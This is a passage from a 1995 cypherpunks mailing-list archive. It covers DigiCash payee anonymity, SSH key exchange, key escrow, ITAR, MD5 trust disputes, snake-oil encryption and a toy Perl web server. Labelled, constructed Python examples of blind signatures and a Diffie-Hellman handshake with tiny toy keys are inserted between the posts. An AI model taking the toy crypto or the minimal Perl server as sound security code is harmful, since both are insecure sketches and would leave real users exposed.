So Bob can't really fraud - unless I've missed something.


An interesting question is whether Bob and Nick can now collude to
expose Alice. Therefore Alice would at least want to verify that the
proto-coins are true? Would that suffice? Or is that not necessary?

> Still, I think this scheme has considerable merit and is worth exploring
...

Certainly.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIyabyxV6mvvBgf5AQESsAP6AqZD+/nJVZxiV5UuPUTPvWNo/vOADAWz
cz65Iw4u9SyqpQfO/sRxZneVCdsDDHi9K+iRFtI+cc5NFCKUVUC2Cop6ExzuCClL
VgR5ILG+ECsw8V+FYHepkch96acgPtVVc3trYExWlr3lY5mYl4ccS9G3Mhn/PyPO
Dq5eP2GEBEA=
=8dxL
-----END PGP SIGNATURE-----
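
The record check and the cut-and-choose opening discussed in this message, as an added example that is not part of the original post. It assumes Chaum-style RSA blinding (the thread does not spell out the coin format); the toy bank key, the serial-number hashing and all function names are constructed for illustration.

```python
import hashlib
import math
import secrets

# Toy bank key, constructed for this example (two Mersenne primes; far too
# small for real use). N and E are public; D is known only to the bank.
_P, _Q = 2**61 - 1, 2**89 - 1
N, E = _P * _Q, 65537
D = pow(E, -1, (_P - 1) * (_Q - 1))


def coin_value(serial: bytes) -> int:
    """Map a coin serial number to the integer the bank's signature covers."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def make_proto_coin(serial: bytes):
    """Bob (payee): blind the coin. Returns (proto_coin, blinding_factor)."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            break
    return (coin_value(serial) * pow(r, E, N)) % N, r


def bank_sign(proto_coin: int) -> int:
    """Bank: debit the payer and sign whatever blinded value she presents."""
    return pow(proto_coin, D, N)


def record_checks_out(proto_coin: int, signed: int) -> bool:
    """Anybody: is `signed` the bank's signature on `proto_coin`?"""
    return 0 <= proto_coin < N and pow(signed, E, N) == proto_coin


def unblind(signed: int, r: int) -> int:
    """Bob: strip the blinding factor to obtain the spendable signature."""
    return (signed * pow(r, -1, N)) % N


def coin_is_good(serial: bytes, signature: int) -> bool:
    """Anybody: does the unblinded signature verify for this serial?"""
    return pow(signature, E, N) == coin_value(serial)


def proto_coin_is_true(proto_coin: int, serial: bytes, r: int) -> bool:
    """Cut-and-choose: Bob opens a proto-coin by revealing serial and blind."""
    return proto_coin == (coin_value(serial) * pow(r, E, N)) % N


def payment(serial: bytes, bob_cheats: bool = False) -> dict:
    """Run one payment and report what each party can verify afterwards."""
    proto, r = make_proto_coin(serial)
    if bob_cheats:
        proto = (proto + 1) % N          # malformed proto-coin sent by Bob
    signed = bank_sign(proto)            # Alice forwards proto, keeps both values
    return {
        "alice_record_ok": record_checks_out(proto, signed),
        "bob_coin_good": coin_is_good(serial, unblind(signed, r)),
        "proto_opens_true": proto_coin_is_true(proto, serial, r),
    }
```

With a malformed proto-coin, Alice's record still verifies against the bank's public key while the coin does not, which is the situation the message attributes to Bob rather than Alice.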




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 24 Oct 95 15:00:42 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <199510240734.AAA23451@jobe.shell.portal.com>
Message-ID: <199510242200.SAA06950@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> I see that Perry is as charming as ever?

And I see that you don't know what you are talking about.

> Perry, I just don't think that it is wise to stick your head in the sand
> and ignore a severe flaw in your algorithm, while actively misrepresenting
> matters to those people who are not intimately familiar with the IETF. 

I wonder if you even know what the IETF is, since you seem to be
waving around an organization I work in like it was a mass of chicken
entrails. 

> Postscript isn't like any other language around.  Operator names have no
> special significance to the interpreter.  You can't just "strip out" 
> dangerous commands.  They aren't "reserved" in the sense that operator
> names are in other languages, like COBOL or BASIC. 
> 
> In Postscript, operator names are simply keys into a LIFO dictionary. 

If, Mr. Anonymous, you can get a postscript interpreter to do I/O
after you have stripped all the system calls that do file I/O out of
the C code for the interpreter merely by invoking the names of the I/O
commands in the postscript books, you have managed a feat beyond mere
spoon bending and ought to be studied by the parapsychologists.

In any case, Netscape doesn't write the postscript interpreters and
doesn't have built in support for postscript and doesn't ship mailcap
files that deal with postscript, so I'd say you are a crank worth ignoring.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 24 Oct 95 16:04:57 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: Hack DigiCash: Payee Anonymity
Message-ID: <199510242333.SAA05678@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ObCrypto: Slim to None, peripheral at best.

At 07:55 PM 10/24/95 +0100, some annoying nym wrote:
>Now all we need is to do is get some specs on how DigiCash's software works
>so that we can code this.  I expect that this method will become quite
>popular.  To withdraw DigiCash, one must come up with $250 to start, sign a
>bunch of forms, etc.  I suspect that most people would rather change money
>in lesser amounts, probably under $50.  This opens up a huge market for
>Blacknet money exchangers.  I would gladly pay Tim's Internet Cash Exchange
>a commission to exchange $50 worth of greenbacks for Digicash instead of
>dealing with Mark Twain and shelling out $250 to start..

Irrelevant point: To open an account as a consumer, not a merchant, and
solely for DigiCash use, only $11 (!) is required.  Although I'll agree
with the bunch of forms part.  Damn, I wish I understood legalese...

Dave
- ----- David E. Smith, "dsmith@midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/
Sorry, the full signature is on strike pending DigiCash salary negotiations
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMI1uAgwyfvCScyE5AQHvpAP+MrQ0vflUe6q7uyXa0PHlyMttf50StEdX
eYsXOlN9wLWH9yF6Wkvx8kXQS9sOE7anMYEk42VvwETq3y1EduP3dYAvSW2h7EG2
X4z0wsUT1l3drcq5ieeakA1nwGmHuQdMgPNaPZ8pvIGluTGobKAvta4Ea0MHy8HY
YdvbDA4w0x0=
=69WP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Tue, 24 Oct 95 09:13:40 PDT
To: weidai@eskimo.com
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951023022123.9641C-100000@eskimo.com>
Message-ID: <199510241625.SAA00777@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> However, I probably won't give up ETT yet, because there are some design 
> differences that would make ETT more useful in certain circumstances.  
> SSH seems to be designed mainly as a secure telnet program, with TCP port 
> redirection added on, which suggests (although I'm not sure) that you 
> need to have a user account on the SSH server to connect to it.  It also 
> does not seem to do any filtering of TCP redirection requests.  Chaining 
> would not work well with SSH because of its packet overhead.

You are quite right here; some kind of account is needed on the
forwarder machine.  (It can, though, be an account without password
and a login shell that just sleeps.)  But anyway, TCP port forwarding
is not its main function.  (I don't think the packetizing is such a
major overhead though - it currently transfers around 400kbytes/sec
over ethernet encrypted with RC4 between P90 machines.)

> authentication schemes.  What are the relative advantages of your protocol
> over a more straight-forward DH + signature of exchange values?  DH would
> provide forward secrecy directly without the need to change the server key
> every hour. 

The reasons for this key exchange are mostly historical.  If I was
starting the implementation now, I would use DH + signatures.  The
performance difference is not very big, but DH + signature would be simpler.

    Tatu
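
The "DH + signature of exchange values" design discussed above, as an added example that is not part of the original message or of SSH's code. The toy group, the toy RSA host key, the hash-then-sign encoding and all function names are assumptions made for illustration.

```python
import hashlib
import secrets

# Toy parameters, constructed for this example only (far too small for real use).
P = 2**127 - 1                      # Mersenne prime used as the DH modulus
G = 3                               # DH base
_p, _q = 2**61 - 1, 2**89 - 1       # Mersenne primes for a toy RSA host key
HOST_N, HOST_E = _p * _q, 65537     # public host key, known to the client
HOST_D = pow(HOST_E, -1, (_p - 1) * (_q - 1))   # long-term signing exponent


def _digest(client_pub: int, server_pub: int) -> int:
    """Hash both exchange values into an integer below the RSA modulus."""
    data = f"{client_pub}|{server_pub}".encode()
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % HOST_N


def host_sign(client_pub: int, server_pub: int) -> int:
    """Server: sign the pair of DH public values with the long-term key."""
    return pow(_digest(client_pub, server_pub), HOST_D, HOST_N)


def host_verify(client_pub: int, server_pub: int, sig: int) -> bool:
    """Client: check the signature against the host key it already trusts."""
    return pow(sig, HOST_E, HOST_N) == _digest(client_pub, server_pub)


def session_key(shared: int) -> str:
    """Derive a session key from the DH shared secret."""
    return hashlib.sha256(str(shared).encode()).hexdigest()


def run_session(tamper: bool = False):
    """One handshake. Returns (client_key, server_key), or None if the
    client rejects the signature over the exchange values."""
    a = secrets.randbelow(P - 3) + 2        # client's ephemeral secret
    A = pow(G, a, P)
    b = secrets.randbelow(P - 3) + 2        # server's ephemeral secret
    B = pow(G, b, P)
    sig = host_sign(A, B)

    # What the client receives; with tamper=True the server's DH value has
    # been altered in transit (constructed failure case).
    B_seen = (B * G) % P if tamper else B
    if not host_verify(A, B_seen, sig):
        return None

    client_key = session_key(pow(B_seen, a, P))
    server_key = session_key(pow(A, b, P))
    # a and b go out of scope here. The long-term key HOST_D only ever signed
    # public values, so learning it later does not recover this session key.
    return client_key, server_key
```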




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Oct 95 18:10:23 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: BlackNet Meets Stanford Law School
Message-ID: <acb2d750010210042399@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:51 PM 10/24/95, Futplex wrote:

>On GAK:
>        "[...] key escrow [...] may sound reasonable, but apply that
>         reasoning to more mundane areas of life. What the government
>         is saying is yes, you can put bars on your windows, locks on
>         your doors and put your jewelry in a safe, but you have to
>         give us the keys and the combination because you might be a
>         crook."
>
>That phrasing sounds rather familiar....

Hmmmhhh...yes, doesn't it though?

By the way, I gave a talk at Stanford Law School last week, to Professor
Margaret Radin's seminar on "Cyberspace and the Law." They had been reading
a bunch of papers and reprints on Clipper, PGP, and crypto policy,
including pieces by both me and Michael Froomkin (whose long paper is
apparently becoming widely read for crypto-legal discussions).

I was using the "curtain" metaphor for key escrow, describing a situation
where the government might insist people only install curtains that have a
secret invisibility mode, where the curtains become transparent to them
only. It's more than just becoming transparent completely, as with key
escrow one does not know that one's communications have been rendered
readable...unless they eventually tell you, as they are _supposed_ to do
with some classes of wiretaps (but not others, as in foreign intelligence
surveillance).

One of the students came up with a nice extension of this metaphor: using
one's own system inside a key escrow wrapper (also called
"superencryption") is like adding a second set of curtains inside the first
set. An obvious point, but a nice metaphor that makes the point to one and
all: the mandatory key escrow system, if adopted, would mandate the use of
transparent-mode curtains and would ban (or try to) the use of additional
sets of curtains.

(What about internal room dividers which obscure the view into one's house
that the cops want? The crypto parallels to this are interesting.)

By the way, Professor Radin made an interesting comment at the end of the
class. I'm paraphrasing, and any loss of her actual intended meaning may be
my fault, so don't take this as gospel.

She said she had previously thought that the implications of strong crypto
would be "handled normally" within the context of markets and courts, but
that after hearing my description of many issues (*) she now has doubts
that the conventional legal system and conventional market system will be
able to handle normally the implications of strong crypto. (By handle
normally, I took her to mean in the way that several other recent
technological advances have been handled without significant disruptions,
in an evolutionary way.)

(* The issues are the usual suspects: anonymous digital cash, remailers,
information markets, copyrights, markets that benefit from untraceable
communication, the BlackNet experience, the utter unbreakability of
long-enough keys, and so on.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Tue, 24 Oct 95 15:28:27 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: The cost of ITAR
Message-ID: <Pine.SOL.3.91.951024174936.1502A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Here is one for the files. . . . .

On page 49 of WIRED 3.11 is the following tidbit from John Battelle

SUN'S CODEMAKING COMRADES

Here's the problem:  Because the US government has outlawed the export of 
industrial-strength encryption, firms seeking to do business abroad find 
themselves without trustworthy security options once they leave US 
boundaries.  How can companies in the information and networking 
business, such as Sun Microsystems, possibly sell a system to Alcatel in 
France, for example, if the encryption that accompanies it can be broken 
by a 14-year-old with too much time on his or her hands?  They can't.  So 
Sun came up with a novel solution: buy Russian.  The Soviets may have 
sucked at cars and strip malls, but they sure as hell knew their 
cryptography.  "The Russians can make any kind of encryption you want," 
says Geoffrey Baehr, chief network officer at Sun.  And what can the US 
government do about a product developed outside its borders?  Nothing.

In fact, Sun was so taken with Russia's computing talent that the company 
recently hired the entire team once responsible for the next generation 
of Soviet supercomputers (and the Russians brought along the plans for 
the beasts).  Ask Sun chief scientist John Gage if he'd rely on 
US-approved encryption to send those plans between Moscow and California, 
and he'll laugh out loud.  "We can't rely on that stuff.  We're talking 
trade secrets here!" - John Battelle

-------------

This looks like a striking example of regulatory arbitrage at work, and 
if it can be confirmed in its details ought to be an extremely powerful 
anecdote in the hands of those working against GAK and ITAR.

The sucking sound is American jobs heading overseas, 
the snorting sound is American trade-secrets being sniffed up 
    by foreign competitors, 
the cackling sound is the laughter of the Four Horsemen, who (if they 
    bother) just buy strong crypto from some hard-currency hungry unemployed 
    ex-Soviet programmer.

Maybe the FBI's responsibility for US counter-intelligence is meant as a 
double-entendre?

C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 24 Oct 95 15:39:02 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Does your software?
In-Reply-To: <9510241549.AA19649@all.net>
Message-ID: <199510242238.SAA19929@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Umm, your get only server sounds like it is secure, but what is the
point advertising it to this list? I could program a GET only
server in far fewer than 80 lines in just a few hours. You could
do it in even fewer lines of perl, or /bin/sh. A real HTTP server
must support all of HTTP/1.0 however for it to be considered a server.
Since yours doesn't, it isn't, it's just a toy. A better project would be
to make HTTP requests under CERN more secure.  In fact, if you don't
handle CGI, you can't handle forms, which means you can't handle
commerce securely.



secure perl "get only" server
copy perl to a secure filesystem
have a chroot c-wrapper there
the wrapper chroot's to this directory and runs the perl script
perl is effectively boxed in


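#!/securedir/perl

# Read the request line, e.g. "GET /index.html HTTP/1.0"
$line = <STDIN>;
($method, $url, $protocol)=split(/\s+/, $line);
# Delete every character except letters, digits and underscore,
# which also strips "/" and "." from the requested name
$url =~ s/[^a-zA-Z0-9_]//g;
if($method =~ /^GET/i)
{
   open(FILE, "$url");
   print "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
   print <FILE>;
   close(FILE);
}

exit 0;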


 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 24 Oct 95 10:46:44 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241425.AA08815@hplyot.obspm.fr>
Message-ID: <9510241745.AA10318@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


<grrrrrrr>

Frederick B. Cohen writes:
 > >  > [...] uses an MD5 checksum which the members
 > >  > of this list seem to place unlimited trust in (incorrectly in my view,
 > >  > but that would be picking two nits with one keyboard entry).

[me]> Can you elaborate WITH FACTS on the supposed weakness of MD5 ?
                        **********
I wonder what is your definition of facts...

 > I didn't say that there were any weaknesses in MD5, all I said was:
 > 	"unlimited trust ... (incorrectly in my view...)"
 > 
 > The lack of adequate demonstration of strength is not the same as a
 > weakness.  It represents only a lack of adequate assurance for placing
 > more than a certain amount of trust in MD5 for the purpose it is being
 > used to accomplish.
 > 
 > As to weaknesses, I seem to remember that someone managed to forge a
 > modification to a program used to observe networks on a Sun so that it
 > had the same MD5 checksum as the official trusted version.  But whether

This is absolute bullshit with a probability of (2^128-1)/2^128

 > this is real is not strictly the issue. 

On the contrary real things should be the issue... not random thoughts

 > In the case of the trust being placed in MD5 by Netscape, the assumption
 > being made (without adequate support as far as I can tell) is that an

because you can't tell 1+1=2 doesn't imply people have to worry...

 > MD5 checksum cannot be forced, through a chosen plaintext attack, to
 > yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
 > allow the known plaintext attack that gets the RSA private key used to
 > authenticate messages.  As far as I am aware (and I may not be aware of
 > everything) there is no reference work to support this assumption.  If

The fact that you obviously didn't take the time to do any
search/reading on the subject does not allow you to go on with mad
assumptions... 

 > the assumption is wrong, then the whole SSL can fall to a selected
 > plaintext attack launchable (presumably) through those general purpose
 > Java applets we have heard so much about.

FYI,  ( false => false ) is a true expression... starting from false
assumption you can demonstrate *anything*
{ if 1+1!=2, lots of things "fall"}

 [me]> [btw who talked about 'unlimited' trust ?]

 > There has been no limit given by anyone on this list to the level of
 > trust they place in MD5.  Several people have posted (without
 > contention) that MD5 is sufficiently trustworthy to trust billions of
 > dollars in commerce to its being able to prevent a selected plaintext
 > attack as alluded to above.  If you think we should trust it, and you
 > don't limit your assessment of trust, what other assumption should I
 > make? If several people proclaim that trust and nobody stands up in
 > disagreement, tacit agreement is my normal (although not necessarily
 > justified) assumption. 

AGAIN, the limit is 2^128 computer operations (as I quoted from the rfc
days ago), which is imo certainly NOT the weakest part of the security
chain...

Do you actually read anything people are mailing or writing ?
</grrrrrrr>

sorry again, I feel tested...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

cracking SEAL Team 6 counter-intelligence DES Pasqua Qaddafi class
 struggle




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 15:54:11 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: Does your software?
In-Reply-To: <199510242238.SAA19929@clark.net>
Message-ID: <9510242251.AA05075@all.net>
MIME-Version: 1.0
Content-Type: text


>   Umm, your get only server sounds like it is secure, but what is the
> point advertising it to this list?

I wasn't advertising.  I was simply answering questions brought up about
my secure W3 server by another person who posted to the list.  For some
reason they thought that they should bring it into the discussion, so I
responded. 

> I could program a GET only
> server in far fewer than 80 lines in just a few hours.

As I have said many times to many others, please go ahead and do it.  I
only wrote the secure server to demonstrate that it was no big deal to
have a secure server and to ease my own fears about protecting all.net
from outside attacks like the ones with buffer overflows.  The source is
on-line and available to anyone, and I only ask a fee if you decide to
use it for commercial purposes.  Nobody has paid me yet, and I assume
they never will.

> You could
> do it in even fewer lines of perl, or /bin/sh.

But how would you demonstrate the security properties?

> A real HTTP server
> must support all of HTTP/1.0 however for it to be considered a server.

It's a secure get-only server.  It only handles 99+% of the real uses of
web servers.

> Since yours doesn't, it isn't, it's just a toy. A better project would be
> to make HTTP requests under CERN more secure.

I agree, but rather than redesign their server, I wrote my own in a few
hours and made it available as an example.  I think that CERN should
make their server secure.

>  In fact, if you don't
> handle CGI, you can't handle forms, which means you can't handle
> commerce securely.

I now do handle forms (another separate 100 line server not yet released).
Please see the experimental version on-line at all.net.

> secure perl "get only" server
> copy perl to a secure filesystem
> have a chroot c-wrapper there
> the wrapper chroot's to this directory and runs the perl script
> perl is effectively boxed in

My secure server includes the chroot  and setUID code in it.  Your C-wrapper
would be part of your code - that adds several lines.  And I don't need Perl
which I think makes it much more secure.  (There I go casting doubts on Perl
security!)

> #!/securedir/perl
> 
> $line = <STDIN>;
> ($method, $url, $protocol)=split(/\s+/, $line);
> $url =~ s/[^a-zA-Z0-9_]//g;
> if($method =~ /^GET/i)
> {
>    open(FILE, "$url");
>    print "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
>    print <FILE>;
>    close(FILE);
> }
> 
> exit 0;

Pretty close, but you don't provide any protection against denial of
services (e.g.  by opening up 1024 simultaneous sessions and leaving
them open indefinitely), against accessing files that aren't there (you
need an error message of some sort - mine does a redirect to the home
page), you don't enforce access controls on the host machine, there may
be buffer overflows associated with long requests, you don't handle some
possible URLs, you don't seem to handle the default URL, you don't
identify the kind of error that caused the failed access, and you don't
provide an audit trail.  Add those and I'll look again to see if there
are other possible problems.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 24 Oct 95 16:08:12 PDT
To: privsoft@ix.netcom.com (Steve )
Subject: Re: Reformated: How secure....
In-Reply-To: <199510241425.HAA20039@ix3.ix.netcom.com>
Message-ID: <199510242307.TAA07020@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Steve writes:
>     2. Re: the 9 digit key.
>         Partially why you misunderstand the strength of the 9 digit key 
> in PrivaSoft is b/c Graphical Encryption is very different from data 
> encryption.

That indicates to me that you don't understand anything at all about
cryptography. I'm not trying to be cruel. People around here have seen
me cruel. It's just that bits are bits and it doesn't matter what you
are encrypting. You seem to think that because images "need humans" to
determine if they make sense that you have somehow won -- in fact,
the statistics of real vs random images are so different that I can
hardly see how one could have an easier time of it.

Amateurs pretending that they are professionals going out and selling
snake-oil crypto are one of the biggest threats in our business. I
doubt that you are going to relent -- folks in your position have an
amazingly stubborn ability to ignore reality -- but I think anyone
buying your product is crazy.

> I fully believe 
> that if any of those who believe that PrivaSoft is a fly-by-night or 
> bogus product have not looked at or tried the software and therefore 
> speak from less than a knowledgeable position.

Reading your messages is sufficient, actually. If I read something
from someone pretending to be a doctor and he notes that his new blood
thinning machine is useful for curing baldness, I don't really have to
try the product, now, do I.

I suspect it would take a real cryptographer very little effort to
break your system, but that no one will bother doing so because it
isn't really worth anyone's time.

> I have 
> personally demonstrated our software to several key individuals in the 
> gov't, military, and corporate arenas both executive and technical 
> persons. All were impressed and have taken the software back for further 
> testing.

Who cares? I know places where you can demonstrate psychic surgery and
get dozens of people to vouch for it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 24 Oct 95 16:38:31 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <199510241554.LAA27916@opine.cs.umass.edu>
Message-ID: <199510242338.TAA07052@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Futplex writes:
> I believe Dr. Cohen's point is that no-one knows, AFAIK, how to prove that a
> one-way hash is truly one-way (uninvertible). We cannot prove that MD5 is
> secure, ergo we cannot (completely) trust it. [Please correct if this is a
> substantially incorrect inference.]

There are hashes that can, in fact, be proven to have the properties
we assign to cryptographic hashes given certain modest assumptions
about some number theory problems and their complexity. True "proof"
is likely impossible.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Tue, 24 Oct 95 11:55:18 PDT
To: cypherpunks@toad.com
Subject: Re: Hack DigiCash: Payee Anonymity
In-Reply-To: <199510240750.IAA04175@utopia.hacktic.nl>
Message-ID: <199510241855.TAA14733@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


David R. Conrad <drc@russell.moore.com> wrote:

> If the payer doesn't add a blinding factor, then the only blinding factor
> is the one known to the payee.  The payee could reveal this blinding
> factor to the bank, destroying the payer's anonymity.

Right.  Both payer and payee should introduce their own blinding factors.

Now all we need to do is get some specs on how DigiCash's software works
so that we can code this.  I expect that this method will become quite
popular.  To withdraw DigiCash, one must come up with $250 to start, sign a
bunch of forms, etc.  I suspect that most people would rather change money
in lesser amounts, probably under $50.  This opens up a huge market for
Blacknet money exchangers.  I would gladly pay Tim's Internet Cash Exchange
a commission to exchange $50 worth of greenbacks for Digicash instead of
dealing with Mark Twain and shelling out $250 to start.
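
Added example, not part of the original post and not DigiCash's actual protocol (the post itself notes the specs were not yet available): a toy RSA blind-signature exchange showing why the payer must add a blinding factor of its own. The key size, the function names and the message flow (payee blinds, payer blinds again, bank signs, each side unblinds in turn) are assumptions made for illustration.

```python
import hashlib
import math
import secrets

# Toy bank key (assumption for this example): two Mersenne primes, far too
# small for real use but enough to show the algebra.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # bank's private exponent


def coin_message(serial):
    """Map a coin serial number into Z_N."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def blinding_factor():
    """Random r in [2, N-1] that is invertible modulo N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            return r


def blind(value, r):
    """Multiply by r^e; the bank's signature on the result carries a factor r."""
    return (value * pow(r, E, N)) % N


def unblind(signed, r):
    """Divide the factor r back out of a signature on a blinded value."""
    return (signed * pow(r, -1, N)) % N


def bank_sign(blinded):
    """The bank signs whatever it is handed at withdrawal, without seeing m."""
    return pow(blinded, D, N)


def verify(m, sig):
    return pow(sig, E, N) == m


def bank_can_link(seen_at_withdrawal, m, revealed_r):
    """Linking test the bank can run if the payee hands over its blinding factor."""
    return seen_at_withdrawal == blind(m, revealed_r)


def run_payment(payer_blinds, serial=b"constructed-coin-0001"):
    """Run one withdrawal and report whether the coin verifies and whether the
    bank, given the payee's factor, can tie the deposit to the withdrawal."""
    m = coin_message(serial)            # payee chooses the coin
    r_payee = blinding_factor()
    from_payee = blind(m, r_payee)      # payee -> payer

    if payer_blinds:
        r_payer = blinding_factor()
        to_bank = blind(from_payee, r_payer)
    else:
        to_bank = from_payee            # only the payee's factor hides m

    signed = bank_sign(to_bank)         # bank records to_bank against the payer
    if payer_blinds:
        signed = unblind(signed, r_payer)
    sig = unblind(signed, r_payee)      # payee ends up with m^d mod N

    return {"valid": verify(m, sig),
            "linked": bank_can_link(to_bank, m, r_payee)}


if __name__ == "__main__":
    print("payee blinding only :", run_payment(payer_blinds=False))
    print("payer and payee both:", run_payment(payer_blinds=True))
```

With only the payee's factor, the value the bank logged at withdrawal equals the deposited coin re-blinded with the revealed factor, so the withdrawal and the deposit match; the payer's extra factor removes that equality.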





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 24 Oct 95 12:10:20 PDT
To: cypherpunks@toad.com
Subject: Re: Welcome to c|net
In-Reply-To: <199510241603.JAA10729@orpheum.cnet.com>
Message-ID: <199510241910.UAA15096@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> From cypherpunks@toad.com  Tue Oct 24 09:03:00 1995
> Received: from cnet.com (central.cnet.com [204.188.123.10]) by
>  orpheum.cnet.com (8.6.12/8.6.12) with ESMTP id JAA10708 for
>  <verify@orpheum.cnet.com>; Tue, 24 Oct 1995 09:03:00 -0700
> Received: from longs.lance.colostate.edu by cnet.com via ESMTP
>  (8.6.12/940518.SGI.central)
>         for <verify@cnet.com> id OAA10916; Tue, 24 Oct 1995 14:53:01 GMT
> Received: from [204.131.233.49] (p49.Denver1.dialup.csn.net
>  [204.131.233.49]) by longs.lance.colostate.edu (8.6.12/8.6.5a (LANCE
>  Revision: 1.3)) with SMTP id KAA07689 for <verify@cnet.com>; Tue, 24 Oct
>  1995 10:02:06 -0600

Well, lookie, it came from csn.net via longs.lance.colostate.edu.  Now who
do we know at that address?

Grow up Larry.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 20:57:16 PDT
To: sommerfeld@orchard.medford.ma.us
Subject: Re: textbooks
Message-ID: <9510250353.AA08472@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> > The quick proof of why the initial and final permutations add nothing to 
> > the security of DES is presented in an informal and quite obvious sidebar.
> 
> Actually, I found the proof not completely convincing.  It's really a
> proof that it doesn't strengthen the DES against a *known plaintext*
> attack, but there are other weaker attacks it may make marginally more
> difficult (or easier..); for instance, partially-known plaintext or
> some forms of verifiable plaintext.
> 

I'm afraid I'm not quite following you here, could you expound a bit?

Ah:) Isn't it great to be talking about encryptions again?:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Tue, 24 Oct 95 13:22:58 PDT
To: elementrix.co.il.info@elementrix.co.il
